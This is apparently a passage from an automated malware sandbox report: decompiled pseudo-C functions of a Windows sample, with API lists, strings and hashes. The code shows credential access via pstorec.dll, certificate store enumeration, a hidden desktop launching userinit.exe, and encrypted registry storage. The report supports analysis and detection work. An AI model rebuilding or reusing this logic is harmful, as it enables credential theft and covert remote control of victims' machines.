					_t98 = _t98 + 1;
					if(_t79 != 0xffffffff) {
						_t81 = _t79 + 1;
						_v20 = _t81;
						goto L19;
					}
					_t68 = _a16;
					 *_t68 = _v16;
					return _t68 & 0xffffff00 | _t98 == _a8;
				}
			}






























    0x004102e1
    0x004102e5
    0x004102ea
    0x004102ec
    0x004102ef
    0x00000000
    0x004102f6
    0x004102f8
    0x0041030b
    0x0041030d
    0x00410310
    0x00410311
    0x004102fa
    0x004102fa
    0x00410301
    0x00410301
    0x00410316
    0x00410321
    0x00410324
    0x00410327
    0x00410328
    0x00410328
    0x00000000
    0x00410328
    0x0041032d
    0x00410334
    0x00410336
    0x00410344
    0x0041034b
    0x0041034e
    0x0041034f
    0x00410338
    0x00410338
    0x0041033f
    0x0041033f
    0x00410358
    0x0041035d
    0x0041036b
    0x00410372
    0x00410375
    0x00410376
    0x0041035f
    0x0041035f
    0x00410366
    0x00410366
    0x00410379
    0x0041037d
    0x00410383
    0x00410385
    0x004103a4
    0x004103a4
    0x004103a9
    0x004103ba
    0x004103bf
    0x004103c7
    0x004103c8
    0x004103ab
    0x004103ab
    0x004103b5
    0x004103b5
    0x004103cd
    0x004103db
    0x004103e2
    0x004103e5
    0x004103e6
    0x004103cf
    0x004103cf
    0x004103d6
    0x004103d6
    0x004103ec
    0x004103ef
    0x004103f4
    0x004103f6
    0x004103fd
    0x004103ff
    0x00410412
    0x00410414
    0x00410417
    0x00410418
    0x00410401
    0x00410401
    0x00410408
    0x00410408
    0x00410421
    0x00410426
    0x00410434
    0x0041043b
    0x0041043e
    0x0041043f
    0x00410428
    0x00410428
    0x0041042f
    0x0041042f
    0x00410442
    0x00410446
    0x00410446
    0x00410452
    0x00410456
    0x00410459
    0x00410461
    0x00410466
    0x0041046c
    0x0041046f
    0x00410470
    0x00410473
    0x0041047b
    0x0041047e
    0x0041047f
    0x00410482
    0x00410482
    0x00410482
    0x00410487
    0x00000000
    0x00410487
    0x00410394
    0x00410396
    0x0041039a
    0x004103a0
    0x004103a1
    0x00000000
    0x004103a1
    0x0041048f
    0x0041049a
    0x004104a1
    0x004104a1

    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
    • Instruction ID: 2052d4281a3d90c27205f1ca7150a7f4f1dc2504459acb9ee385333bf5e3f5c8
    • Opcode Fuzzy Hash: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
    • Instruction Fuzzy Hash: CF51DA32E019299BDB14CE58C4502EDF7B1EF85324F1A41AADD66BF381C6B4ADC1D784
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00551738, Relevance: .1, Instructions: 98COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.464199377.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 6511a4327051b7be31b983a9ab75a75ed9122f4dada8e0244f727c4d72e9071a
    • Instruction ID: 649cd37e71bc0638f05c0231eb38df82e76747a98814b4e6410aae599caddb71
    • Opcode Fuzzy Hash: 6511a4327051b7be31b983a9ab75a75ed9122f4dada8e0244f727c4d72e9071a
    • Instruction Fuzzy Hash: 0321CE36128FD19EC7228A3CC41468A7FD1FA5A6113CC0BDEC4C08F693D760945ADBCA
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00410003, Relevance: .1, Instructions: 72COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 100%
    			E00410003() {
				signed int _t18;
				signed int _t38;
				signed int _t55;
				signed int _t56;
				signed int* _t59;
				signed int _t60;
				signed int* _t61;

				_t18 =  *0x418070; // 0x1c1
				if(_t18 >= 0x270) {
					_t60 = 0;
					do {
						_t55 = _t60 << 2;
						_t1 = _t55 + 0x4176ac; // 0x1ec5befd
						_t2 = 0x4176a8 + _t55; // 0xa014c253
						_t3 = 0x4176a8 + _t55; // 0xa014c253
						_t6 = _t55 + 0x417cdc; // 0x8c27497
						_t60 = _t60 + 1;
						 *(0x4176a8 + _t55) = (( *_t1 ^  *_t2) & 0x7fffffff ^  *_t3) >> 0x00000001 ^  *(0x41652c + ((( *_t1 ^  *_t2) & 0x7fffffff ^  *_t3) & 0x00000001) * 4) ^  *_t6;
					} while (_t60 < 0xe3);
					if(_t60 < 0x26f) {
						_t59 =  &(0x4176a8[_t60]);
						do {
							_t10 =  &(_t59[1]); // 0x4
							_t61 = _t10;
							 *_t59 =  *(0x41652c + ((( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) & 0x00000001) * 4) ^  *(_t61 - 0x390) ^ (( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) >> 0x00000001;
							_t59 = _t61;
						} while (_t59 < 0x418064);
					}
					_t56 =  *0x418064; // 0x170e954e
					_t38 =  *0x4176a8; // 0xa014c253
					 *0x418064 = ((_t38 ^ _t56) & 0x7fffffff ^ _t56) >> 0x00000001 ^  *(0x41652c + (((_t38 ^ _t56) & 0x7fffffff ^ _t56) & 0x00000001) * 4) ^  *0x417cd8;
					_t18 = 0;
				}
				 *0x418070 = _t18 + 1;
				return (0x4176a8[_t18] ^ 0x4176a8[_t18] >> 0x0000000b ^ ((0x4176a8[_t18] ^ 0x4176a8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x4176a8[_t18] ^ 0x4176a8[_t18] >> 0x0000000b ^ ((0x4176a8[_t18] ^ 0x4176a8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x4176a8[_t18] ^ 0x4176a8[_t18] >> 0x0000000b ^ ((0x4176a8[_t18] ^ 0x4176a8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x4176a8[_t18] ^ 0x4176a8[_t18] >> 0x0000000b ^ ((0x4176a8[_t18] ^ 0x4176a8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
			}










    0x00410003
    0x0041000d
    0x00410015
    0x0041001c
    0x0041001e
    0x00410021
    0x00410027
    0x0041002f
    0x00410043
    0x00410049
    0x00410050
    0x00410050
    0x0041005e
    0x00410060
    0x00410067
    0x00410069
    0x00410069
    0x00410088
    0x0041008a
    0x0041008c
    0x00410067
    0x00410094
    0x0041009a
    0x004100bb
    0x004100c0
    0x004100c0
    0x004100ca
    0x004100f5

    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 55cbc62ff1998b03969c92e3c9ddedc467e7e45992083c2753fe463a97d08030
    • Instruction ID: 791ddf2f0d4ca3f6eb6ea8a6629241e8d784f5dee080fe2e61f9478f22b93e39
    • Opcode Fuzzy Hash: 55cbc62ff1998b03969c92e3c9ddedc467e7e45992083c2753fe463a97d08030
    • Instruction Fuzzy Hash: 54214F323218058FD748CF3CEC95A9637E2F78D32472A857DD119CB290DA76E852CB48
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00405833, Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 189stringregistryencryptionCOMMON
    Download Yara Rule
    C-Code - Quality: 60%
    			E00405833(void* __ecx) {
				signed int _v8;
				signed int _v12;
				char _v16;
				void* _v20;
				short _v540;
				signed int _t44;
				void* _t45;
				int _t50;
				void* _t55;
				char _t58;
				void* _t63;
				void* _t74;
				void* _t78;
				void* _t84;
				void* _t88;
				signed int _t89;
				WCHAR* _t91;
				WCHAR* _t92;
				WCHAR* _t93;
				intOrPtr _t109;

				_t88 = __ecx;
				 *0x416778 = 0;
				E0040B826(0);
				E00414B7A();
				L004042E5();
				E004082DF();
				 *0x41807c = 0;
				_v16 = 1;
				lstrcpyW( &_v540,  *0x416bb0);
				_t91 = L"rsldps";
				lstrcatW( &_v540, _t91);
				_v20 = CreateMutexW(0x417680, 1, _t91);
				if(GetLastError() == 0) {
					_t92 = "09ck_=ldfuihpfre";
					_t55 = E00408471(_t39, _t88, 1, _t92);
					_t99 = _t55 - 4;
					if(_t55 != 4) {
						E004051FC();
						_push( &_v16);
						_push(_t92);
						_push(1);
						_t84 = 4;
						E004084E1(_t84, _t99);
					}
					_t93 = "3709128dk0023444";
					_v8 = 0;
					if(E00408471( &_v8, _t88, 1, _t93) != 4) {
						_v12 = 0;
					} else {
						_v12 =  *_v8;
					}
					_t58 = E004046EE(_t88, 0, L"MY", 0, _v12);
					_v16 = _t58;
					_t101 = _t58 - _v12;
					if(_t58 != _v12) {
						_push( &_v16);
						_push(_t93);
						_push(1);
						_t78 = 4;
						E004084E1(_t78, _t101);
					}
					E0040F0C0(_v8);
					_t94 = "!!!0-0=9-0=23434";
					_v8 = 0;
					if(E00408471( &_v8, _t88, 1, "!!!0-0=9-0=23434") != 0) {
						_t74 = E0040811E(_t88, _v8, _t61);
						_t103 = _t74;
						if(_t74 != 0) {
							E00408558(_t103, 1, _t94);
						}
						E0040F0C0(_v8);
					}
					_t95 = "~23324m\'m434dKkl";
					_t63 = E00408471(0, _t88, 1, "~23324m\'m434dKkl");
					_t104 = _t63 - 4;
					if(_t63 == 4) {
						 *0x416d0c(0x10000, 0, 0, E00404833);
						E00408558(_t104, 1, _t95);
					}
					_t96 = "3208()_*09303333";
					_v8 = 0;
					if(E00408471( &_v8, _t88, 1, "3208()_*09303333") == 4) {
						_t67 = _v8;
						_t24 =  *_v8 == 0;
						E004055B9((_t67 & 0xffffff00 |  *_v8 == 0x00000000) & 0x000000ff);
						E00408558(_t24, 1, _t96);
					}
					E0040F0C0(_v8);
				}
				if(_v20 != 0) {
					CloseHandle(_v20);
				}
				 *0x417064 = 0;
				 *0x417060 = 0;
				 *0x416fe4(0x417048);
				 *0x417024 = 0;
				 *0x417020 = 0;
				 *0x417028 = 0;
				 *0x41702c = 0;
				 *0x416fe4(0x417030);
				 *0x416fe4(0x416798);
				 *0x4167b8 = 0;
				E00405E22();
				_t44 = 0;
				_t89 = 0;
				 *0x4167bc = 0;
				 *0x4167b4 = 0;
				_t109 =  *0x41651c; // 0x4164f4
				if(_t109 == 0) {
					L21:
					 *0x4169e8 = 0;
					 *0x4169ec = 0;
					_t45 = E0040493A();
					if( *0x418080 == 0xffffffff) {
						E0040F173(_t45, 0x416a18, 0, 0x50);
						_t50 = RegisterClipboardFormatW(L"HomeWorkMessage1");
						 *0x416a10 = _t50;
						if(_t50 != 0) {
							 *0x416fe4(0x416a34);
						} else {
							 *0x418080 = 0;
						}
					}
					 *0x416fe4(0x41677c);
					E004072F3(0x4164a0, 0xffffffff);
					return 1;
				} else {
					do {
						_t28 = _t44 + 0x416518; // 0x4169e4
						 *((intOrPtr*)( *_t28)) = 0;
						_t89 = _t89 + 1;
						_t44 = _t89 * 0xc;
					} while ( *((intOrPtr*)(_t44 + 0x41651c)) != 0);
					goto L21;
				}
			}























    0x00405833
    0x00405843
    0x00405849
    0x0040584e
    0x00405853
    0x00405858
    0x0040586d
    0x00405873
    0x00405876
    0x0040587c
    0x00405889
    0x0040589c
    0x004058a7
    0x004058ad
    0x004058b4
    0x004058b9
    0x004058bc
    0x004058be
    0x004058c6
    0x004058c7
    0x004058c8
    0x004058cb
    0x004058cc
    0x004058cc
    0x004058d1
    0x004058db
    0x004058e6
    0x004058f2
    0x004058e8
    0x004058ed
    0x004058ed
    0x004058fe
    0x00405903
    0x00405906
    0x00405909
    0x0040590e
    0x0040590f
    0x00405910
    0x00405913
    0x00405914
    0x00405914
    0x0040591c
    0x00405921
    0x0040592b
    0x00405935
    0x0040593b
    0x00405940
    0x00405942
    0x00405946
    0x00405946
    0x0040594e
    0x0040594e
    0x00405953
    0x0040595c
    0x00405961
    0x00405964
    0x00405972
    0x0040597a
    0x0040597a
    0x0040597f
    0x00405989
    0x00405994
    0x00405996
    0x0040599b
    0x004059a2
    0x004059a9
    0x004059a9
    0x004059b1
    0x004059b1
    0x004059b9
    0x004059be
    0x004059be
    0x004059c9
    0x004059cf
    0x004059d5
    0x004059e0
    0x004059e6
    0x004059ec
    0x004059f2
    0x004059f8
    0x00405a03
    0x00405a09
    0x00405a0f
    0x00405a14
    0x00405a16
    0x00405a18
    0x00405a1e
    0x00405a24
    0x00405a2a
    0x00405a42
    0x00405a42
    0x00405a48
    0x00405a4e
    0x00405a5a
    0x00405a64
    0x00405a6e
    0x00405a74
    0x00405a7b
    0x00405a8a
    0x00405a7d
    0x00405a7d
    0x00405a7d
    0x00405a7b
    0x00405a95
    0x00405aa2
    0x00405aad
    0x00405a2c
    0x00405a2c
    0x00405a2c
    0x00405a32
    0x00405a34
    0x00405a37
    0x00405a3a
    0x00000000
    0x00405a2c

    APIs
      • Part of subcall function 0040B826: CharLowerBuffA.USER32(00000000,00000031,?,-80000002,025DF9A0,025DF870,00000001,?,00000002), ref: 0040B959
      • Part of subcall function 00414B7A: PathCombineW.SHLWAPI(?,025DF5A8,025DF770,00000000), ref: 00414BA1
      • Part of subcall function 00414B7A: PathCombineW.SHLWAPI(00417478,00417478,?), ref: 00414BB0
    • lstrcpyW.KERNEL32(?), ref: 00405876
    • lstrcatW.KERNEL32(?,rsldps), ref: 00405889
    • CreateMutexW.KERNEL32(00417680,00000001,rsldps), ref: 00405896
    • GetLastError.KERNEL32 ref: 0040589F
    • CertEnumSystemStore.CRYPT32(00010000,00000000,00000000,00404833), ref: 00405972
    • CloseHandle.KERNEL32(?), ref: 004059BE
    • RtlInitializeCriticalSection.NTDLL(00417048), ref: 004059D5
    • RtlInitializeCriticalSection.NTDLL(00417030), ref: 004059F8
    • RtlInitializeCriticalSection.NTDLL(00416798), ref: 00405A03
    • RegisterClipboardFormatW.USER32(HomeWorkMessage1), ref: 00405A6E
    • RtlInitializeCriticalSection.NTDLL(00416A34), ref: 00405A8A
      • Part of subcall function 004051FC: LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00405212
      • Part of subcall function 004051FC: GetProcAddress.KERNELBASE(00000000), ref: 00405219
    • RtlInitializeCriticalSection.NTDLL(0041677C), ref: 00405A95
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalInitializeSection$CombinePath$AddressBuffCertCharClipboardCloseCreateEnumErrorFormatHandleLastLibraryLoadLowerMutexProcRegisterStoreSystemlstrcatlstrcpy
    • String ID: !!!0-0=9-0=23434$09ck_=ldfuihpfre$3208()_*09303333$3709128dk0023444$HomeWorkMessage1$rsldps$~23324m'm434dKkl
    • API String ID: 3376213276-1824837563
    • Opcode ID: ac67833702d10734762169eb26c588ca7ebcd9e5562ae374e2779a658493c704
    • Instruction ID: 1aacd35b0114484f722f1f0b50e97e109845d7d7678958e6f30686a432ce3998
    • Opcode Fuzzy Hash: ac67833702d10734762169eb26c588ca7ebcd9e5562ae374e2779a658493c704
    • Instruction Fuzzy Hash: E8518075940214ABCB10AFA59D49DDF3B78EB49B14712857FF141B22D1CB788A40CF9C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00408E1C, Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 134synchronizationwindowsleepCOMMON
    Download Yara Rule
    C-Code - Quality: 91%
    			E00408E1C(void* __ebx, void* __ecx, struct HWND__** _a4) {
				struct tagMSG _v32;
				char _v44;
				struct _WNDCLASSW _v84;
				void* _t33;
				void* _t39;
				int _t49;
				void* _t55;
				WCHAR* _t56;
				WCHAR* _t58;
				struct HWND__* _t59;
				void* _t60;
				struct HWND__** _t61;

				_t60 = __ecx;
				_t55 = __ebx;
				_t61 = _a4;
				_t61[1] = 0;
				while(E00414119(_t60) == 0) {
					if(WaitForSingleObject(_t61[2], 0x3e8) == 0x102) {
						continue;
					}
					L17:
					 *_t61 =  *_t61 | 0xffffffff;
					CloseHandle(_t61[1]);
					return 0;
				}
				_push(_t55);
				_t56 = L"QggrrtyW";
				_t33 = OpenFileMappingW(6, 0, _t56);
				_t61[1] = _t33;
				if(_t33 == 0) {
					_t61[1] = CreateFileMappingW(0, 0x417680, 4, 0, 0xf42400, _t56);
				}
				if(_t61[1] != 0) {
					E0040F0FC( &_v44, L"userinit.exe", 0x18);
					 *0x418080 =  *0x418080 | 0xffffffff;
					_v32.lParam = 0;
					_t58 = L"SubCallssEdit7792";
					_t39 = E0040BDF2(_t58, 1, 0,  &_v44);
					 *0x418080 = 0;
					if(_t39 != 0) {
						Sleep(0x1388);
						_v84.style = 0x200;
						_v84.lpfnWndProc = E00408E05;
						_v84.cbClsExtra = 0;
						_v84.cbWndExtra = 0;
						_v84.hInstance = GetModuleHandleA(0);
						_v84.hIcon = 0;
						_v84.hCursor = 0;
						_v84.hbrBackground = 6;
						_v84.lpszMenuName = 0;
						_v84.lpszClassName = _t58;
						if(RegisterClassW( &_v84) != 0) {
							_t59 = CreateWindowExW(0x800a4, _v84.lpszClassName, 0x401008, 0, 0, 0, 0, 0, FindWindowW(L"Shell_TrayWnd", 0), 0, _v84.hInstance, 0);
							if(_t59 != 0) {
								 *_t61 = _t59;
								ShowWindow(_t59, 4);
								SetTimer(_t59, 0, 0x3e8, 0);
								while(1) {
									_t49 = GetMessageW( &_v32, _t59, 0, 0);
									if(_t49 == 0) {
										break;
									}
									if(_t49 != 0xffffffff && WaitForSingleObject(_t61[2], 0) != 0) {
										DispatchMessageW( &_v32);
										continue;
									}
									break;
								}
								 *0x416ae8(_t59);
							}
							UnregisterClassW(_v84.lpszClassName, _v84.hInstance);
						}
					}
				}
				goto L17;
			}















    0x00408e1c
    0x00408e1c
    0x00408e24
    0x00408e29
    0x00408e47
    0x00408e41
    0x00000000
    0x00000000
    0x00408fa2
    0x00408fa5
    0x00408fa8
    0x00408fb3
    0x00408fb3
    0x00408e50
    0x00408e51
    0x00408e5a
    0x00408e60
    0x00408e65
    0x00408e7c
    0x00408e7c
    0x00408e82
    0x00408e93
    0x00408e98
    0x00408ea1
    0x00408eaa
    0x00408eb3
    0x00408eb8
    0x00408ec0
    0x00408ecb
    0x00408ed2
    0x00408ed9
    0x00408ee0
    0x00408ee3
    0x00408eec
    0x00408ef3
    0x00408ef6
    0x00408ef9
    0x00408f00
    0x00408f03
    0x00408f0f
    0x00408f3f
    0x00408f43
    0x00408f48
    0x00408f4a
    0x00408f58
    0x00408f7d
    0x00408f84
    0x00408f8c
    0x00000000
    0x00000000
    0x00408f63
    0x00408f77
    0x00000000
    0x00408f77
    0x00000000
    0x00408f63
    0x00408f8f
    0x00408f8f
    0x00408f9b
    0x00408f9b
    0x00408f0f
    0x00408ec0
    0x00000000

    APIs
      • Part of subcall function 00414119: OpenWindowStationW.USER32(Winsta0,00000000,10000000), ref: 00414132
      • Part of subcall function 00414119: CreateWindowStationW.USER32(Winsta0,00000000,10000000,00000000), ref: 00414144
      • Part of subcall function 00414119: GetProcessWindowStation.USER32 ref: 00414156
      • Part of subcall function 00414119: OpenDesktopW.USER32(SubCallssEdit7792,00000000,00000000,10000000), ref: 00414177
      • Part of subcall function 00414119: CreateDesktopW.USER32(SubCallssEdit7792,00000000,00000000,00000000,10000000,00000000), ref: 00414189
      • Part of subcall function 00414119: GetCurrentThreadId.KERNEL32 ref: 00414195
      • Part of subcall function 00414119: GetThreadDesktop.USER32(00000000,?,?), ref: 0041419C
      • Part of subcall function 00414119: SetThreadDesktop.USER32(00000000,00000000,00000000,?,?), ref: 004141AE
      • Part of subcall function 00414119: CloseDesktop.USER32(00000000,00000000,00000000,?,?), ref: 004141C2
      • Part of subcall function 00414119: CloseWindowStation.USER32(?,?), ref: 004141E2
    • WaitForSingleObject.KERNEL32(?,000003E8), ref: 00408E36
    • OpenFileMappingW.KERNEL32(00000006,00000000,QggrrtyW), ref: 00408E5A
    • CreateFileMappingW.KERNEL32(00000000,00417680,00000004,00000000,00F42400,QggrrtyW), ref: 00408E76
    • Sleep.KERNEL32(00001388,00000001,00000000,?,?,userinit.exe,00000018), ref: 00408ECB
    • GetModuleHandleA.KERNEL32(00000000), ref: 00408EE6
    • RegisterClassW.USER32(00000200), ref: 00408F06
    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00408F20
    • CreateWindowExW.USER32(000800A4,?,00401008,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00408F39
    • ShowWindow.USER32(00000000,00000004), ref: 00408F4A
    • SetTimer.USER32(00000000,00000000,000003E8,00000000), ref: 00408F58
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00408F69
    • DispatchMessageW.USER32(?), ref: 00408F77
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00408F84
    • UnregisterClassW.USER32(?,?), ref: 00408F9B
    • CloseHandle.KERNEL32(?), ref: 00408FA8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Window$Desktop$CreateStation$CloseOpenThread$ClassFileHandleMappingMessageObjectSingleWait$CurrentDispatchFindModuleProcessRegisterShowSleepTimerUnregister
    • String ID: QggrrtyW$Shell_TrayWnd$SubCallssEdit7792$userinit.exe
    • API String ID: 1772360239-2149883801
    • Opcode ID: c28ca6751f2e7661f9a361af20d3f42b152a2c2f202fec7a52624afe3808fcaa
    • Instruction ID: b39eb0b77ee67d016617acbd1a2b46b5fea6aa486c3f0a7b2b53bb9763b8356d
    • Opcode Fuzzy Hash: c28ca6751f2e7661f9a361af20d3f42b152a2c2f202fec7a52624afe3808fcaa
    • Instruction Fuzzy Hash: A54158B1941229ABCB115FA5DD48ADFBE7DFF09760B11822AF155F21D0CBB88441CBA8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040859F, Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 264registryCOMMON
    Download Yara Rule
    C-Code - Quality: 93%
    			E0040859F() {
				void** _t94;
				signed int _t99;
				long _t113;
				long _t121;
				long _t130;
				short* _t136;
				int _t138;
				char* _t139;
				intOrPtr* _t143;
				void* _t145;
				void* _t156;
				int _t163;
				int _t167;
				void* _t170;
				void* _t172;

				_t170 = _t172 - 0x6c;
				_t156 =  *( *(_t170 + 0x7c));
				_t163 = 0;
				if(_t156 <= 0x10) {
					L46:
					return _t163;
				}
				 *(_t170 + 0x68) = 0;
				if((_t156 - 0x00000010 & 0xfffffffe) <= 0) {
					goto L46;
				} else {
					_t136 =  *( *(_t170 + 0x78));
					_t143 = _t136;
					while( *_t143 != _t163) {
						 *(_t170 + 0x68) =  *(_t170 + 0x68) + 1;
						_t143 = _t143 + 2;
						if( *(_t170 + 0x68) < _t156 - 0x10 >> 1) {
							continue;
						} else {
							L45:
							goto L46;
						}
					}
					_t145 = E0040F533(_t136) + _t80;
					_t150 = _t145 + _t136 + 2;
					 *(_t170 + 0x64) = _t145 + _t136 + 2 + 0x10;
					 *(_t170 + 0x60) = _t136 -  *(_t170 + 0x64) + _t156;
					if(_t156 - _t145 + 2 < 0x10) {
						goto L45;
					}
					E00408175(_t170 - 4, _t150);
					if( *_t136 != 0x2a ||  *((intOrPtr*)(_t136 + 2)) != 0) {
						E004100F6(_t170 + 0x4c, _t136, E0040F533(_t136) + _t86);
						E00408175(_t170 - 0x54, _t170 + 0x4c);
						PathCombineW(_t170 - 0x25c, L"software\\microsoft\\windows\\currentversion\\explorer", _t170 - 0x54);
						_t138 =  *(_t170 + 0x74);
						_t94 = _t170 + 0x68;
						if(_t138 != 0xf) {
							_t99 = RegOpenKeyExW(0x80000001, _t170 - 0x25c, 0, (0 | _t138 == 0x00000011) + 1, _t94);
						} else {
							_t99 = RegCreateKeyExW(0x80000001, _t170 - 0x25c, 0, 0, 0, 2, 0, _t94, 0);
						}
						asm("sbb esi, esi");
						_t163 =  ~_t99 + 1;
						if(_t163 == 0) {
							goto L45;
						} else {
							if(_t138 != 0xf) {
								if(_t138 != 0x11) {
									if(_t138 == 0x10) {
										_t163 = 0;
										if(RegQueryValueExW( *(_t170 + 0x68), _t170 - 4, 0, 0, 0, _t170 + 0x74) == 0) {
											_t139 = E0040F0A8( *(_t170 + 0x74));
											if(_t139 != 0) {
												if(RegQueryValueExW( *(_t170 + 0x68), _t170 - 4, 0, 0, _t139, _t170 + 0x74) != 0) {
													E0040F0C0(_t139);
												} else {
													_t167 =  *(_t170 + 0x78);
													E0040F0C0( *_t167);
													 *_t167 = _t139;
													_t163 =  *(_t170 + 0x74);
													 *( *(_t170 + 0x7c)) = _t163;
												}
											}
										}
									}
									L43:
									_push( *(_t170 + 0x68));
									goto L44;
								}
								_t113 = RegDeleteValueW( *(_t170 + 0x68), _t170 - 4);
								L36:
								asm("sbb esi, esi");
								_t163 =  ~_t113 + 1;
								goto L43;
							}
							_t113 = RegSetValueExW( *(_t170 + 0x68), _t170 - 4, 0, 3,  *(_t170 + 0x64),  *(_t170 + 0x60));
							goto L36;
						}
					} else {
						if(RegOpenKeyExW(0x80000001, L"software\\microsoft\\windows\\currentversion\\explorer", 0, 8, _t170 + 0x5c) != 0) {
							goto L45;
						} else {
							 *(_t170 + 0x78) = 0;
							while(1) {
								 *(_t170 + 0x7c) = 0x28;
								_t121 = RegEnumKeyExW( *(_t170 + 0x5c),  *(_t170 + 0x78), _t170 - 0x54, _t170 + 0x7c, 0, 0, 0, _t170 + 0x54);
								if(_t121 == 0xea) {
									goto L26;
								}
								if(_t121 != 0) {
									_push( *(_t170 + 0x5c));
									L44:
									RegCloseKey();
									goto L45;
								}
								if( *(_t170 + 0x7c) == 0x26 &&  *(_t170 - 0x54) == 0x7b &&  *((short*)(_t170 - 0xa)) == 0x7d) {
									PathCombineW(_t170 - 0x25c, L"software\\microsoft\\windows\\currentversion\\explorer", _t170 - 0x54);
									if( *(_t170 + 0x74) != 0x11) {
										if( *(_t170 + 0x74) != 0xf) {
											 *(_t170 + 0x68) = 0;
											L25:
											RegCloseKey( *(_t170 + 0x68));
											goto L26;
										}
										if(RegCreateKeyExW(0x80000001, _t170 - 0x25c, 0, 0, 0, 2, 0, _t170 + 0x68, 0) != 0) {
											goto L25;
										}
										_t130 = RegSetValueExW( *(_t170 + 0x68), _t170 - 4, 0, 3,  *(_t170 + 0x64),  *(_t170 + 0x60));
										L22:
										if(_t130 == 0) {
											_t163 = _t163 + 1;
										}
										goto L25;
									}
									if(RegOpenKeyExW(0x80000001, _t170 - 0x25c, 0, 2, _t170 + 0x68) != 0) {
										goto L25;
									} else {
										_t130 = RegDeleteValueW( *(_t170 + 0x68), _t170 - 4);
										goto L22;
									}
								}
								L26:
								 *(_t170 + 0x78) =  *(_t170 + 0x78) + 1;
							}
						}
					}
				}
			}


















    0x004085a0
    0x004085af
    0x004085b1
    0x004085b6
    0x0040887e
    0x00408886
    0x00408886
    0x004085bf
    0x004085c8
    0x00000000
    0x004085ce
    0x004085d2
    0x004085d4
    0x004085d6
    0x004085db
    0x004085e6
    0x004085ea
    0x00000000
    0x004085ec
    0x0040887d
    0x00000000
    0x0040887d
    0x004085ea
    0x004085f8
    0x004085fb
    0x00408602
    0x00408610
    0x00408616
    0x00000000
    0x00000000
    0x0040861f
    0x0040862a
    0x00408761
    0x0040876c
    0x00408781
    0x00408787
    0x0040878a
    0x00408790
    0x004087c6
    0x00408792
    0x004087a6
    0x004087a6
    0x004087d0
    0x004087d2
    0x004087d5
    0x00000000
    0x004087db
    0x004087de
    0x004087fb
    0x00408816
    0x00408826
    0x00408830
    0x0040883a
    0x0040883e
    0x00408856
    0x0040886f
    0x00408858
    0x00408858
    0x0040885d
    0x00408865
    0x00408867
    0x0040886a
    0x0040886a
    0x00408856
    0x0040883e
    0x00408830
    0x00408874
    0x00408874
    0x00000000
    0x00408874
    0x00408804
    0x0040880a
    0x0040880e
    0x00408810
    0x00000000
    0x00408810
    0x004087f0
    0x00000000
    0x004087f0
    0x0040863a
    0x00408654
    0x00000000
    0x0040865a
    0x0040865a
    0x0040865d
    0x0040866f
    0x00408679
    0x00408684
    0x00000000
    0x00000000
    0x0040868c
    0x0040874a
    0x00408877
    0x00408877
    0x00000000
    0x00408877
    0x00408696
    0x004086c2
    0x004086cc
    0x004086fa
    0x00408736
    0x00408739
    0x0040873c
    0x00000000
    0x0040873c
    0x00408717
    0x00000000
    0x00000000
    0x00408729
    0x0040872f
    0x00408731
    0x00408733
    0x00408733
    0x00000000
    0x00408731
    0x004086e5
    0x00000000
    0x004086e7
    0x004086ee
    0x00000000
    0x004086ee
    0x004086e5
    0x00408742
    0x00408742
    0x00408742
    0x0040865d
    0x00408654
    0x0040862a

    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,software\microsoft\windows\currentversion\explorer,00000000,00000008,?), ref: 0040864C
    • RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,?), ref: 00408679
    • PathCombineW.SHLWAPI(?,software\microsoft\windows\currentversion\explorer,?), ref: 004086C2
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000002,?), ref: 004086DD
    • RegDeleteValueW.ADVAPI32(?,?), ref: 004086EE
    • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 0040870F
    • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,?), ref: 00408729
      • Part of subcall function 004100F6: CryptAcquireContextW.ADVAPI32(0041420C,00000000,00000000,00000001,F0000040,?,0041420C,00000000,?,-0000001C,00000000,?,?,?), ref: 0041010F
      • Part of subcall function 004100F6: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00410127
